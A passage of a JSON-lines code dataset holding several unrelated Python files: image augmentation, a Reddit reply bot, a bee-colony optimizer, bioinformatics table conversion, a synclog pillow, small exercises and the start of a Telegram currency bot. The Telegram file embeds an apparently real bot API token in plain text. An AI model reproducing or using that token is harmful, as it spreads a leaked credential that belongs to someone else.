image[:, :1, :]\n image_left = cv2.resize(image_left, (h, h))\n image_left = cv2.vconcat([blank, image_left, blank])\n\n image_right = image[:, w - 1:, :]\n image_right = cv2.resize(image_right, (h, h))\n image_right = cv2.vconcat([blank, image_right, blank])\n\n image = cv2.hconcat([image_left, image_center, image_right])\n image = ndimage.rotate(image, angle, reshape=True)\n bh, bw, _ = image.shape\n image = image[int((bh - h_) / 2):int((bh + h_) / 2),\n int((bw - w_) / 2):int((bw + w_) / 2), :]\n return image\n\n\ndef change_object_color(img, mask):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n r = random.randint(0, 255)\n img[:,:,0] += r\n img[:,:,0] %= 256\n img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\n\n res_img = img.copy()\n\n res_img = cv2.cvtColor(res_img, cv2.COLOR_BGR2HSV)\n r = random.randint(0, 255)\n res_img[:,:,0] += r\n res_img[:,:,0] %= 256\n res_img = cv2.cvtColor(res_img, cv2.COLOR_HSV2BGR)\n res_img = np.where(mask==255, res_img, img)\n return res_img\n\n\ndef rotate_image_and_annotation(img,\n areas,\n bbox_transform_function,\n class_names,\n object_type=None,\n horizontal=False,\n vertical=False,\n angle=None,\n affin=False,\n trans_color=False):\n arg = None\n if horizontal:\n rotated_img = cv2.flip(img, 1)\n elif vertical:\n rotated_img = cv2.flip(img, 0)\n elif angle is not None:\n rotated_img = rotate_image(angle, img)\n else:\n arg = make_random_sequential()\n rotated_img = arg.augment_images([img.copy()])[0]\n\n\n annotation = []\n\n img_mask = img = np.zeros(list(img.shape), dtype=np.uint8)\n box_list = []\n class_list = []\n for obj_area in areas:\n\n if \"[\" in obj_area:\n assert object_type == \"polygon\"\n\n boxes, class_id = ast.literal_eval(obj_area)\n boxes = [\n bbox_transform_function(box, rotated_img, arg) for box in boxes\n ]\n for box in boxes:\n poly = np.array([(x, y) for x, y in zip(box[::2], box[1::2])]).astype(np.int32)\n cv2.fillPoly(\n img_mask,\n pts = [poly],\n color = (255, 255, 255))\n box_list.append(boxes)\n else:\n *box, class_id = map(int, obj_area.split(','))\n box = bbox_transform_function(box, rotated_img, arg)\n if object_type == \"polygon\":\n poly = np.array([(x, y) for x, y in zip(box[::2], box[1::2])]).astype(np.int32)\n cv2.fillPoly(\n img_mask,\n pts = [poly],\n color = (255, 255, 255))\n boxes = [box]\n del box\n box_list.append(boxes)\n else:\n cv2.rectangle(\n img_mask, (box[0], box[1]), (box[2], box[3]),\n (255, 255, 255),\n thickness=-1,\n lineType=cv2.LINE_AA)\n box_list.append(box)\n class_list.append(class_id)\n\n if trans_color:\n rotated_img = change_object_color(rotated_img, img_mask)\n annotated_img = rotated_img.copy()\n\n for obj, class_id in zip(box_list, class_list):\n if object_type == \"bbox\":\n box = obj\n cv2.rectangle(\n annotated_img, (box[0], box[1]), (box[2], box[3]),\n (255, 255, 255),\n thickness=2,\n lineType=cv2.LINE_AA)\n cv2.putText(annotated_img, class_names[class_id], (box[0], box[1]),\n cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 255), 2,\n cv2.LINE_AA)\n annotation.append((box, class_id))\n else:\n boxes = obj\n cv2.polylines(\n annotated_img,\n [np.reshape(box, (-1, 2)).astype(np.int32) for box in boxes],\n isClosed=True,\n color=(255, 0, 0),\n thickness=2,\n )\n for box in boxes:\n cv2.putText(annotated_img, class_names[class_id],\n (box[0], box[1]), cv2.FONT_HERSHEY_PLAIN, 1,\n (255, 255, 255), 2, cv2.LINE_AA)\n annotation.append((boxes, class_id))\n\n return rotated_img, annotated_img, annotation\n\n\ndef rotate(annotations_path,\n horizontal=None,\n vertical=None,\n affine=None,\n angle=None,\n trans_color=False,\n numbers_of_trans=100):\n\n horizontal = bool(horizontal)\n vertical = bool(vertical)\n affine = bool(affine)\n if angle is not None:\n angle = int(angle)\n\n basedir = os.path.dirname(annotations_path)\n\n with open(annotations_path) as f:\n annotations = [f_line.split() for f_line in f][:numbers_of_trans]\n\n\n if len(annotations[0][1].split(',')) == 5:\n object_type = 'bbox'\n else:\n object_type = 'polygon'\n\n if horizontal:\n suf = \"_h\"\n bbox_transform_function_factory = flip_bbox_horizontal if object_type == 'bbox' else flip_polygon_horizontal\n elif vertical:\n suf = \"_v\"\n bbox_transform_function_factory = flip_bbox_vertical if object_type == 'bbox' else flip_polygon_vertical\n elif angle is not None:\n suf = \"_a\" + str(angle)\n bbox_transform_function_factory = rotate_bbox_angle if object_type == 'bbox' else rotate_polygon_angle\n else:\n suf = \"_t\"\n bbox_transform_function_factory = random_bbox_transform if object_type == 'bbox' else random_polygon_transform\n \n if trans_color is not False:\n suf = suf + \"_c\"\n\n classes_path = os.path.join(basedir, \"classes.txt\")\n new_annotations_path = suf.join(os.path.splitext(annotations_path))\n with open(classes_path) as f:\n class_names = [c.strip() for c in f]\n\n annotations_ = []\n for i, data in enumerate(annotations):\n img_file, areas = data[0], data[1:]\n\n img_file_name = os.path.basename(img_file)\n\n img = cv2.imread(img_file)\n\n if bbox_transform_function_factory is not None:\n bbox_transform_function = bbox_transform_function_factory(\n img.shape[1], img.shape[0], angle)\n\n\n (rotated_img, annotated_img,\n annotation) = rotate_image_and_annotation(\n img, areas, bbox_transform_function, class_names, object_type,\n horizontal, vertical, angle, affine, trans_color)\n\n new_img_dir = os.path.dirname(img_file) + suf\n os.makedirs(new_img_dir, exist_ok=True)\n img_new_file = os.path.join(new_img_dir, img_file_name)\n cv2.imwrite(img_new_file, rotated_img)\n\n print(img_new_file)\n annotations_.append((img_new_file, annotation))\n\n verbose_dir = os.path.dirname(img_file) + suf + \"_annot\"\n os.makedirs(verbose_dir, exist_ok=True)\n cv2.imwrite(\n os.path.join(verbose_dir, img_file_name), annotated_img)\n\n with open(new_annotations_path, mode='w') as f:\n for img_filepath, annotation in annotations_:\n if object_type == \"bbox\":\n print(\n img_filepath,\n \" \".join(\"{box},{class_id}\".format(\n box=\",\".join(map(str, box)),\n class_id=class_id,\n ) for box, class_id in annotation),\n file=f,\n )\n else:\n print(\n img_filepath,\n \" \".join(\"{polygons},{class_id}\".format(\n polygons=_list_to_str(polygons),\n class_id=class_id,\n ) for polygons, class_id in annotation),\n file=f,\n )\n\n print(new_img_dir)\n print(new_annotations_path)\n\n\ndef _main():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n parser.add_argument('-a', '--annotations_path', required=True)\n group.add_argument('-ho', '--horizontal', action='store_true')\n group.add_argument('-ve', '--vertical', action='store_true')\n group.add_argument('-ang', '--angle', type=int)\n group.add_argument('-af', '--affine_transform', action='store_true')\n parser.add_argument('-c', '--trans_color', action='store_true')\n parser.add_argument('-n', '--numbers_of_trans', type=int, default=100)\n\n args = parser.parse_args()\n rotate(\n args.annotations_path,\n horizontal=args.horizontal,\n vertical=args.vertical,\n affine=args.affine_transform,\n angle=args.angle,\n trans_color=args.trans_color,\n numbers_of_trans=args.numbers_of_trans\n )\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"scripts/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":13926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252956569","text":"import os\nimport praw\nimport threading\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nreddit = praw.Reddit(\n client_id=os.getenv(\"CLIENT_ID\"),\n client_secret=os.getenv(\"CLIENT_SECRET\"),\n password=os.getenv(\"PASSWORD\"),\n user_agent=os.getenv(\"USER_AGENT\"),\n username=os.getenv(\"REDDIT_USERNAME\"),\n)\n\n\ndef start():\n while True:\n check_witnesses_thread = threading.Thread(target=check_witnesses())\n check_witnesses_thread.start()\n\n check_replies_thread = threading.Thread(target=check_replies())\n check_replies_thread.start()\n\n\ndef check_witnesses():\n witness_words = [\"Witness me!\", \"Witness me\"]\n for comment in reddit.subreddit(\"test\").stream.comments():\n count = 0\n comment_body = comment.body.strip()\n if any(witness.lower() in comment_body.lower() for witness in witness_words):\n print(\"String with \\\"sample user comment\\\" found in comment \" + comment.id)\n comment.reply(\"Witness!\")\n count += 1\n print(\"Replied to comment \" + comment.id)\n print(\"Comments replied to: {}\".format(count))\n\n\ndef check_replies():\n print(\"Checking for replies\")\n good_bot_words = [\"goodbot\", \"good bot\", \"goodbot!\", \"good bot!\"]\n local_count = 0\n for comment in reddit.inbox.unread(limit=None):\n comment_body = comment.body.strip()\n if any(goodbot.lower() in comment_body.lower() for goodbot in good_bot_words):\n print(\"Found someone who appreciates the bot!\")\n comment.reply(\"I have witnessed {} witnesses.\".format(1))\n comment.mark_read()\n print(\"Comments replied to: {}\".format(local_count))\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"198531134","text":"import numpy as np\n\n\n# This code was based on in the following references:\n# [1] \"On clarifying misconceptions when comparing variants of the Artificial FoodSource Colony Algorithm by offering a new\n# implementation\" published in 2015 by Marjan Mernik, Shih-Hsi Liu, Dervis Karaboga and Matej Crepinsek\n# [2] \"A modified Artificial FoodSource Colony algorithm for real-parameter optimization\" published in 2010 by\n# Bahriye Akay and Dervis Karaboga\n\n# This implementation consider #_employed = #_onlookers = #_food_sources = colony_size / 2\n\nclass FoodSource(object):\n def __init__(self, dim):\n nan = float('nan')\n self.pos = [nan for _ in range(dim)]\n self.cost = np.inf\n self.fitness = 0.0\n self.prob = 0.0\n self.trials = 0\n\n\nclass ABC(object):\n def __init__(self, objective_function, n_iter=1000, n_eval=None, dim=30, colony_size=30, trials_limit=100):\n\n self.objective_function = objective_function.function\n\n self.dim = dim\n self.minf = objective_function.minf\n self.maxf = objective_function.maxf\n self.metric_type = objective_function.metric_type\n self.n_iter = n_iter\n self.n_eval = n_eval\n\n self.gbest = None\n self.optimum_cost_tracking_iter = []\n self.optimum_cost_tracking_eval = []\n\n self.num_fs = int(colony_size / 2)\n self.trials_limit = trials_limit\n self.food_sources = []\n\n def __str__(self):\n return 'ABC'\n\n @staticmethod\n def calculate_fitness(cost):\n if cost >= 0:\n result = 1.0 / (1.0 + cost)\n else:\n result = 1.0 + abs(cost)\n return result\n\n def calculate_probabilities(self):\n sum_fit = 0.0\n for fs in range(self.num_fs):\n sum_fit += self.food_sources[fs].fitness\n\n for fs in range(self.num_fs):\n self.food_sources[fs].prob = (\n self.food_sources[fs].fitness / sum_fit)\n\n def update_best_solution(self):\n for fs in self.food_sources:\n if fs.cost < self.gbest.cost:\n self.gbest.pos = fs.pos\n self.gbest.cost = fs.cost\n\n def init_fs(self, pos):\n fs = FoodSource(self.dim)\n fs.pos = pos\n fs.cost = self.objective_function(fs.pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fs.fitness = self.calculate_fitness(fs.cost)\n return fs\n\n def init_colony(self):\n self.food_sources = []\n self.gbest = FoodSource(self.dim)\n self.gbest.cost = np.inf\n\n for i in range(self.num_fs):\n rand = np.random.random(self.dim)\n\n fs = self.init_fs(self.minf + rand * (self.maxf - self.minf))\n self.food_sources.append(fs)\n\n if fs.cost < self.gbest.cost:\n self.gbest.pos = fs.pos\n self.gbest.cost = fs.cost\n\n def employed_bee_phase(self):\n for fs in range(self.num_fs):\n k = list(range(self.num_fs))\n k.remove(fs)\n k = np.random.choice(np.array(k))\n j = np.random.choice(range(self.dim))\n phi = np.random.uniform(-1, 1)\n\n new_pos = np.copy(self.food_sources[fs].pos)\n new_pos[j] = self.food_sources[fs].pos[j] + phi * (\n self.food_sources[fs].pos[j] - self.food_sources[k].pos[j])\n\n if new_pos[j] < self.minf:\n new_pos[j] = self.minf\n elif new_pos[j] > self.maxf:\n new_pos[j] = self.maxf\n cost = self.objective_function(new_pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fit = self.calculate_fitness(cost)\n\n if self.metric_type == 'min':\n if fit > self.food_sources[fs].fitness:\n self.food_sources[fs].pos = new_pos\n self.food_sources[fs].cost = cost\n self.food_sources[fs].fitness = fit\n self.food_sources[fs].trials = 0\n else:\n self.food_sources[fs].trials += 1\n else:\n if fit < self.food_sources[fs].fitness:\n self.food_sources[fs].pos = new_pos\n self.food_sources[fs].cost = cost\n self.food_sources[fs].fitness = fit\n self.food_sources[fs].trials = 0\n else:\n self.food_sources[fs].trials += 1\n\n def onlooker_bee_phase(self):\n t = s = 0\n while t < self.num_fs:\n s = (s + 1) % self.num_fs\n r = np.random.uniform()\n if self.metric_type == 'min':\n if r < self.food_sources[s].prob:\n t += 1\n\n k = list(range(self.num_fs))\n k.remove(s)\n k = np.random.choice(np.array(k))\n j = np.random.choice(range(self.dim))\n phi = np.random.uniform(-1, 1)\n\n new_pos = np.copy(self.food_sources[s].pos)\n new_pos[j] = new_pos[j] + phi * \\\n (new_pos[j] - self.food_sources[k].pos[j])\n\n if new_pos[j] < self.minf:\n new_pos[j] = self.minf\n elif new_pos[j] > self.maxf:\n new_pos[j] = self.maxf\n cost = self.objective_function(new_pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fit = self.calculate_fitness(cost)\n\n if fit > self.food_sources[s].fitness and (self.food_sources[s].cost - cost) >= 0.0001:\n self.food_sources[s].pos = new_pos\n self.food_sources[s].cost = cost\n self.food_sources[s].fitness = fit\n self.food_sources[s].trials = 0\n else:\n self.food_sources[s].trials += 1\n else:\n if r > self.food_sources[s].prob:\n t += 1\n\n k = list(range(self.num_fs))\n k.remove(s)\n k = np.random.choice(np.array(k))\n j = np.random.choice(range(self.dim))\n phi = np.random.uniform(-1, 1)\n\n new_pos = np.copy(self.food_sources[s].pos)\n new_pos[j] = new_pos[j] + phi * \\\n (new_pos[j] - self.food_sources[k].pos[j])\n\n if new_pos[j] < self.minf:\n new_pos[j] = self.minf\n elif new_pos[j] > self.maxf:\n new_pos[j] = self.maxf\n cost = self.objective_function(new_pos)\n self.optimum_cost_tracking_eval.append(self.gbest.cost)\n fit = self.calculate_fitness(cost)\n\n if fit < self.food_sources[s].fitness and (self.food_sources[s].cost - cost) >= 0.0001:\n self.food_sources[s].pos = new_pos\n self.food_sources[s].cost = cost\n self.food_sources[s].fitness = fit\n self.food_sources[s].trials = 0\n else:\n self.food_sources[s].trials += 1\n\n def get_max_trial(self):\n max_ = 0\n for fs in range(self.num_fs):\n if self.food_sources[fs].trials > self.food_sources[max_].trials:\n max_ = fs\n return max_\n\n def scout_bee_phase(self):\n max_ = self.get_max_trial()\n\n if self.food_sources[max_].trials >= self.trials_limit:\n rand = np.random.random(self.dim)\n pos = self.minf + rand * (self.maxf - self.minf)\n self.food_sources[max_] = self.init_fs(pos)\n\n def optimize(self):\n self.optimum_cost_tracking_eval = []\n self.optimum_cost_tracking_iter = []\n\n self.init_colony()\n self.update_best_solution()\n\n range_sim = self.n_iter\n tracking = self.optimum_cost_tracking_iter\n\n if self.n_eval is not None:\n range_sim = self.n_eval\n tracking = self.optimum_cost_tracking_eval\n\n while tracking.__len__() < range_sim:\n self.employed_bee_phase()\n self.calculate_probabilities()\n self.onlooker_bee_phase()\n self.update_best_solution()\n self.scout_bee_phase()\n self.optimum_cost_tracking_iter.append(self.gbest.cost)\n # print('{} - {} - {}'.format(self.optimum_cost_tracking_iter.__len__(),\n # self.optimum_cost_tracking_eval.__len__(),\n # self.gbest.cost))\n\n","sub_path":"algorithms/optimization/ABC.py","file_name":"ABC.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"575761832","text":"\n# coding: utf-8\n\n# **TURNING THE LEfSe TABLE IN A BETTER LOOKING PLOT - GENERATING AN R INPUT FILE**\n\n# In[3]:\n\nl = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure2/LEfSe.txt', 'rU').read()\nl = l.replace('\\t',',')\n\n\n# In[6]:\n\nl1 = [ i for i in l.split('\\n')[:-1] if i.split(',')[2] != '']\n\n\n# In[20]:\n\nl1_old = [i for i in l1 if i.split(',')[2][0] == 'o']\nl1_young = [i for i in l1 if i.split(',')[2][0] == 'y']\n\n\n# In[21]:\n\nl1_old_s = sorted(l1_old, key = lambda x: (x.split(',')[-2]))\nl1_young_s = sorted(l1_young, key = lambda x: (x.split(',')[-2]))[::-1]\n\n\n# In[30]:\n\nl2 = 'GO,value1,group,LDA,p-value\\n'+','.join([ i+'\\n' for i in l1_young_s]).replace('\\n,','\\n')+','.join([ i+'\\n' for i in l1_old_s]).replace('\\n,','\\n')\n\n\n# In[31]:\n\nz = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure2/lefse.csv', 'w')\nz.write(l2)\nz.close()\n\n\n# Now the same, for figure 4\n\n# In[70]:\n\nl_4 = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure4/LEfSe.txt', 'rU').read()\nl_4 = l_4.replace('\\t',',')\nl_4_1 = [ i for i in l_4.split('\\n')[:-1] if i.split(',')[2] != '']\n\n\n# In[73]:\n\nl_4_1_old = [i for i in l_4_1 if i.split(',')[2].split('_')[1][-1] == 'd']\nl_4_1_young = [i for i in l_4_1 if i.split(',')[2].split('_')[1][-1] == 'g']\nl411_old_s = sorted(l_4_1_old, key = lambda x: (x.split(',')[-2]))\nl411_young_s = sorted(l_4_1_young, key = lambda x: (x.split(',')[-2]))[::-1]\n\n\n# In[74]:\n\nl42 = 'GO,value1,group,LDA,p-value\\n'+','.join([ i+'\\n' for i in l411_young_s]).replace('\\n,','\\n')+','.join([ i+'\\n' for i in l411_old_s]).replace('\\n,','\\n')\nz = open('/Volumes/group_dv/personal/DValenzano/month-by-month/Feb2016/uBiome_paper/Figure4/lefse.csv', 'w')\nz.write(l42)\nz.close()\n\n\n# In[ ]:\n\n\n\n","sub_path":"23-Feb-2016.py","file_name":"23-Feb-2016.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274024596","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom casexml.apps.phone.dbaccessors.sync_logs_by_user import get_synclogs_for_user\nfrom corehq.apps.change_feed import topics\nfrom corehq.apps.change_feed.consumer.feed import KafkaChangeFeed, KafkaCheckpointEventHandler\nfrom corehq.apps.receiverwrapper.util import get_version_and_app_from_build_id\nfrom corehq.apps.users.models import CouchUser, CommCareUser, WebUser, DeviceAppMeta\nfrom corehq.apps.users.util import update_latest_builds, update_last_sync, update_device_meta\nfrom corehq.util.doc_processor.interface import BaseDocProcessor, DocumentProcessorController\nfrom corehq.util.doc_processor.couch import CouchDocumentProvider\n\nfrom dimagi.utils.parsing import string_to_utc_datetime\n\nfrom pillowtop.pillow.interface import ConstructedPillow\nfrom pillowtop.processors.interface import PillowProcessor\nfrom pillowtop.feed.interface import Change\nfrom pillowtop.checkpoints.manager import KafkaPillowCheckpoint\nfrom pillowtop.reindexer.reindexer import Reindexer, ReindexerFactory\n\n\nSYNCLOG_SQL_USER_SYNC_GROUP_ID = \"synclog_sql_user_sync\"\n\n\ndef get_user_sync_history_pillow(\n pillow_id='UpdateUserSyncHistoryPillow', num_processes=1, process_num=0, **kwargs):\n \"\"\"\n This gets a pillow which iterates through all synclogs\n \"\"\"\n change_feed = KafkaChangeFeed(\n topics=[topics.SYNCLOG_SQL], group_id=SYNCLOG_SQL_USER_SYNC_GROUP_ID,\n num_processes=num_processes, process_num=process_num)\n checkpoint = KafkaPillowCheckpoint(pillow_id, [topics.SYNCLOG_SQL])\n return ConstructedPillow(\n name=pillow_id,\n checkpoint=checkpoint,\n change_feed=change_feed,\n processor=UserSyncHistoryProcessor(),\n change_processed_event_handler=KafkaCheckpointEventHandler(\n checkpoint=checkpoint, checkpoint_frequency=100, change_feed=change_feed\n ),\n )\n\n\nclass UserSyncHistoryProcessor(PillowProcessor):\n\n def process_change(self, pillow_instance, change):\n synclog = change.get_document()\n if not synclog:\n return\n\n version = None\n app_id = None\n try:\n sync_date = string_to_utc_datetime(synclog.get('date'))\n except (ValueError, AttributeError):\n return\n build_id = synclog.get('build_id')\n if build_id:\n version, app_id = get_version_and_app_from_build_id(synclog.get('domain'), build_id)\n user_id = synclog.get('user_id')\n\n if user_id:\n user = CouchUser.get_by_user_id(user_id)\n save = update_last_sync(user, app_id, sync_date, version)\n if version:\n save |= update_latest_builds(user, app_id, sync_date, version)\n\n app_meta = None\n device_id = synclog.get('device_id')\n if device_id:\n if app_id:\n app_meta = DeviceAppMeta(app_id=app_id, build_id=build_id, last_sync=sync_date)\n save |= update_device_meta(user, device_id, device_app_meta=app_meta, save=False)\n\n if save:\n user.save(fire_signals=False)\n\n\nclass UserSyncHistoryReindexerDocProcessor(BaseDocProcessor):\n\n def __init__(self, pillow_processor):\n self.pillow_processor = pillow_processor\n\n def process_doc(self, doc):\n synclog_changes = self._doc_to_changes(doc)\n for change in synclog_changes:\n try:\n self.pillow_processor.process_change(None, change)\n except Exception:\n return False\n return True\n\n def handle_skip(self, doc):\n print('Unable to process user {}'.format(\n doc['_id'],\n ))\n return True\n\n def _doc_to_changes(self, doc):\n # creates a change object for the last 10 synclogs\n # of the given user, for the synclog pillow to process.\n # this means we wont have to iterate through all synclogs\n # when reindexing.\n synclogs = get_synclogs_for_user(doc['_id'], limit=10)\n changes = [Change(\n id=res['doc']['_id'],\n sequence_id=None,\n document=res['doc']\n ) for res in synclogs]\n return changes\n\n\nclass UserSyncHistoryReindexer(Reindexer):\n\n def __init__(self, doc_provider, chunk_size=1000, reset=False):\n self.reset = reset\n self.doc_provider = doc_provider\n self.chunk_size = chunk_size\n self.doc_processor = UserSyncHistoryReindexerDocProcessor(UserSyncHistoryProcessor())\n\n def reindex(self):\n processor = DocumentProcessorController(\n self.doc_provider,\n self.doc_processor,\n reset=self.reset,\n chunk_size=self.chunk_size,\n )\n processor.run()\n\n\nclass UpdateUserSyncHistoryReindexerFactory(ReindexerFactory):\n slug = 'user-sync-history'\n arg_contributors = [\n ReindexerFactory.resumable_reindexer_args,\n ]\n\n def build(self):\n iteration_key = \"UpdateUserSyncHistoryPillow_reindexer\"\n doc_provider = CouchDocumentProvider(iteration_key, doc_type_tuples=[\n CommCareUser,\n WebUser\n ])\n return UserSyncHistoryReindexer(doc_provider, **self.options)\n","sub_path":"corehq/pillows/synclog.py","file_name":"synclog.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"367475949","text":"\"\"\"\n 练习1: 将day04/exercise01功能,封装到函数中。\n\n # 在终端中获取一个四位整数,计算每位相加和.\n str_number = input(\"请输入整数:\")\n result = 0\n for item in str_number:\n result += int(item)\n print(result)\n\"\"\"\n\n\ndef each_unit_sum(str_number):\n \"\"\"\n 遍历字符串类型整数的每位,然后求和.\n :param str_number:需要计算的str类型的整数\n :return: 求和的结果\n \"\"\"\n result = 0\n for item in str_number:\n result += int(item)\n return result\n\nre = each_unit_sum(\"12345\")\nprint(re)\nprint(each_unit_sum(\"65788908908965756\"))\n\n\n\n","sub_path":"01-python基础/day07/exercise04.py","file_name":"exercise04.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36529035","text":"\n\nraw = \"3113322113\"\n#raw = \"1\"\noutput = raw\n#expected = \"132123222113\"\n\n\nfor x in range(50):\n #print(output)\n raw = output\n output = ''\n chain = False\n chainVal = ''\n lastVal = 'x'\n chainCnt = 1\n for i in range(len(raw)):\n\n try:\n if raw[i+1] == raw[i]:\n #start chain \n if chain == False:\n chainCnt = 2\n chain = True\n else:\n chainCnt = chainCnt + 1\n else:\n output = output + str(chainCnt) + raw[i]\n chainCnt = 1\n except IndexError:\n output = output + str(chainCnt) + raw[i]\n chainCnt = 1\n\n \n \n \n lastVal = i\n\n #output = output + str(chainCnt) + lastVal\n\n#print(output)\n\n\n \n #rotated\n #for i in range(int(len(raw)/2)):\n # part = raw[i*2:i*2+2]\n #p0 = int(part[0])\n #p1 = part[1]\n #output = output + p0 * p1\n #raw = output\n\n \n#if i == lastVal:\n# chain = True\n# chainCnt = chainCnt + 1\n# \n# elif (chain == True): #close chain\n# if lastVal == 'x':\n# lastVal = i\n# #print(str(chainCnt) + \" times for lastVal=\" + lastVal)\n# output = output + str(chainCnt) + lastVal\n# chain = False\n# chainCnt = 1\n#\n# else:\n# chain = True\n# chainCnt = 1\n","sub_path":"Advent2015/Day/Day10/d10.py","file_name":"d10.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217442410","text":"#!/usr/bin/python3\nimport configparse_wrapper.cpwrap as cp\nimport Player\nimport TrueSkillWrapper as TS\nfrom fuzzywuzzy import fuzz\nfrom datetime import datetime, timedelta\n\nknown_players = dict()\n\n# care for cpu load #\nplayer_ranks = dict()\nlast_rank_update = datetime.now()\n\ndef load_save():\n with open(\"score.log\") as f:\n for l in f:\n p = Player.PlayerFormDatabase(l)\n known_players[p.steamid] = p\n\ndef save_to_file(fname=\"score.log\"):\n with open(fname,\"w\") as f:\n for p in known_players.values():\n f.write(p.toCSV()+'\\n')\n\ndef get_player_rank(p):\n global player_ranks\n try:\n return str(player_ranks[p])\n except KeyError:\n return \"N/A\"\n\n \ndef dump_rating(top=0, forceMeanSort=False, enforceWhitelist=None):\n global known_players\n ret = \"\"\n if forceMeanSort:\n sort = sorted(known_players.values(),key=lambda x: x.rating.mu,reverse=True)\n else:\n sort = sorted(known_players.values(),key=lambda x: TS.get_env().expose(x.rating),reverse=True)\n if enforceWhitelist:\n sort = list(filter(lambda x: x.name in enforceWhitelist, sort))\n tmp = [\"{} {} mean: {} var: {} WinRatio: {}% ({} Games)\".format(x.get_name().ljust(30),\\\n str(int(TS.get_env().expose(x.rating))).rjust(5),str(int(x.rating.mu)).rjust(4),\\\n str(int(x.rating.sigma)).rjust(4),x.winratio().rjust(4),str(x.games).rjust(3))\\\n for x in sort]\n if top != 0:\n tmp = tmp[:top]\n count = 0\n for s in tmp:\n count += 1\n ret += (\"Rank: \"+str(count).rjust(4) +\" \" + s + \"\\n\") \n return ret\n\ndef sync_from_database(players):\n for p in players:\n #print(\"BKnP: {}\".format(p))\n if p in known_players:\n #print(\"KnP: {}\".format(p))\n p.rating = known_players[p].rating\n if type(players) == dict:\n players[p] = p.rating\n else:\n known_players.update({Player.DummyPlayer(p.steamid, p.name):Player.PlayerForDatabase(None,None,None,player=p)})\n\ndef sync_to_database(players,win):\n global last_rank_update\n global player_ranks\n\n for p in players:\n known_players[p].rating = players[p]\n if win:\n known_players[p].wins += 1\n known_players[p].games += 1\n\n # update player ranks #\n if last_rank_update - datetime.now() > timedelta(seconds=240):\n last_rank_update = datetime.now()\n s = sorted(known_players.values(),key=lambda x: TS.get_env().expose(x.rating),reverse=True)\n rank = 1\n for p in s:\n if p in player_ranks:\n player_ranks[p] = rank\n else:\n player_ranks.update({p:rank})\n rank += 1\n\ndef _get_known_players():\n return known_players\n\n\ndef save_event(event):\n return\n\ndef save_psql():\n f=open(\"pass.secret\",'r')\n pw=f.readline().strip();\n f.close()\n PSQL.save(cp.CFG(\"databse_name\"),cp.CFG(\"database_user\"),cp.CFG(\"database_host\"),pw,known_players)\n\ndef fuzzy_find_player(name):\n ret = \"\"\n tup_list = []\n TS.lock()\n try:\n for p in known_players.values():\n sim = fuzz.token_set_ratio(name.lower(),p.name.lower())\n tup_list += [(sim,p)]\n finally:\n TS.unlock()\n return sorted(tup_list,key=lambda x: x[0],reverse=True)[0][1]\n","sub_path":"python/Storrage.py","file_name":"Storrage.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"128664595","text":"import telebot\r\nimport json\r\nimport requests\r\n\r\nTOKEN = '1584797382:AAFFno-eFfdEh35S6MUXNw8gNdMs3yGQ0vg'\r\n\r\nbot = telebot.TeleBot(TOKEN)\r\n\r\nkeys = {\r\n 'биткоин' : 'BTC',\r\n 'эфириум' : 'ETH',\r\n 'доллар' : 'USD'\r\n }\r\n\r\nclass ConvertionException(Exception):\r\n pass\r\n\r\n@bot.message_handler(commands=['start', 'help'])\r\ndef echo_test(message: telebot.types.Message):\r\n text = 'Чтобы начать работу введите команду боту в следующем формате:\\nИмя валюты\\n' \\\r\n 'В какую валюту перевести\\n' \\\r\n 'Количество переводимой валюты\\n' \\\r\n 'Увидеть список всех доступных валют: /values'\r\n bot.reply_to(message, text)\r\n\r\n@bot.message_handler(commands=['values'])\r\ndef values(message: telebot.types.Message):\r\n text = 'Доступные валюты:'\r\n for key in keys.keys():\r\n text = '\\n' .join((text, key, ))\r\n bot.reply_to (message, text)\r\n\r\n@bot.message_handler(content_types=['text', ])\r\ndef convert(message: telebot.types.Message):\r\n values = message.text.split(' ')\r\n\r\n if len(values) > 3:\r\n raise ConvertionException('Слишком много параметров.')\r\n\r\n quote, base, amount = values\r\n\r\n if quote == base:\r\n raise ConvertionException(f'Невозможно перевести одинаковые валюты {base}.')\r\n\r\n try:\r\n quote_ticker = keys[quote]\r\n except KeyError:\r\n raise ConvertionException(f'Не удалось обработать валюту {quote}.')\r\n\r\n try:\r\n base_ticker = keys[base]\r\n except KeyError:\r\n raise ConvertionException (f'Не удалось обработать валюту {base}.')\r\n try:\r\n amount = float(amount)\r\n except ValueError:\r\n raise ConvertionException (f'Не удалось обработать количество {amount}.')\r\n\r\n\r\n r = 